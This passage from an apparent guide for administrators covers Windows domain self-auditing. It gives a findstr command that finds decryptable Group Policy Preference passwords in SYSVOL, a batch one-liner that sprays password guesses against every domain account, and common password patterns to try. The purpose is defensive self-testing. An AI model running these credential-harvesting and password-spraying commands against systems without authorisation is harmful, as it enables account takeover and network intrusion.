Remove Passwords from Group Policy Preference (GPP) Files.Group Policy Preference (GPP) files initially expanded the capabilities of Group Policy to allow for adding users and passwords. The password resides in a file on the domain controller that is readable by all domain users and is encrypted. However, the private key used to encrypt the password has been published making it possible to decrypt any password stored in GPP. Microsoft released a patch in 2014 (link to: https://technet.microsoft.com/en-us/library/security/ms14-025.aspx) that removed the ability to deploy passwords using GPP because of this issue. However, the patch did not remove any passwords already existing in GPP files. Even if you don’t quite understand what all this means, just run this simple command from your work computer. If it returns anything, you’ve got passwords being openly exposed on your internal network. The command searches through XML files on the domain controller looking for the word ‘cpassword’
findstr /S cpassword %logonserver%\sysvol\*.xmlAn example result from running this command is shown below. The ‘cpassword’ value, which has been redacted in this screenshot, is an encrypted password which can be easily decrypted. These passwords are often times valid administrator credentials.
Check For Weak Password UseAn attacker could penetrate your network by impersonating other users after discovering their credentials. Chances are, someone on your network is using an all too easy to guess password. But how do you know? Try it! This one-liner will guess a set of passwords against all users on the domain.
@FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\DC-NAME\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\DC-NAME\IPC$ > NULCreate a list of all domain usernames in a file called users.txt, one username per line. Put your password guesses in a file called pass.txt but be careful about account lockout! To play it safe, just use one password guess at a time. Lastly, substitute your domain name and domain controller name where highlighted in yellow above. Here are some great password guesses you should try, because your tester will:
- Current Season Name and Year (e.g. Winter2015, Spring16)
- Variations on Company Name
- [email protected]